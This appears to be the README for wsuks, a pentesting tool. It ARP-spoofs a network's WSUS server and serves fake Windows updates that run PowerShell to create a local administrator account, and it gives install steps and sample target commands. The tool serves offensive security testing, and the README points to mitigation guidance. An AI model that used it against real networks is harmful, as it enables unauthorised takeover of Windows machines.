wsuks 0.2.1

A Tool for automating the MITM attack on the WSUS connection

wsuks

Weaponizing the WSUS Attack

Becoming local Admin on a domain joined Windows Machine is usually the first step to obtain domain admin privileges in a pentest. To utilize the WSUS attack automatically this Tool spoofs the ip address of the WSUS-Server inside the network via arp and serves its own Windows Update as soon as the client requests them. Per Default a Windows Client requests Updates every 24h. On request wsuks provides its own "Updates" executing Powershell commands on the target to create an local Admin and add it to the local Administrators group.

The served executable (Default: PsExec64.exe) as well as the executed command can be changed as needed.

Installation

Using pipx:

sudo apt install python3-pipx git
sudo pipx ensurepath
sudo pipx install wsuks

Using poetry:

sudo apt install python3-poetry
git clone https://github.com/NeffIsBack/wsuks
cd wsuks
sudo poetry install

Usage

❗wsuks must be run as root❗

With pipx:

sudo -i
wsuks
wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20

With poetry:

sudo poetry run wsuks
sudo poetry run wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20

About & Mitigation

In the PyWSUS Repository from GoSecure you can find a great documentation how to you could detect and mitigate this attack. They also wrote a great Guide demonstrating how this attack works in detail here.

This Tool is based on the following projects:

• https://github.com/GoSecure/pywsus
• https://github.com/GoSecure/wsuspect-proxy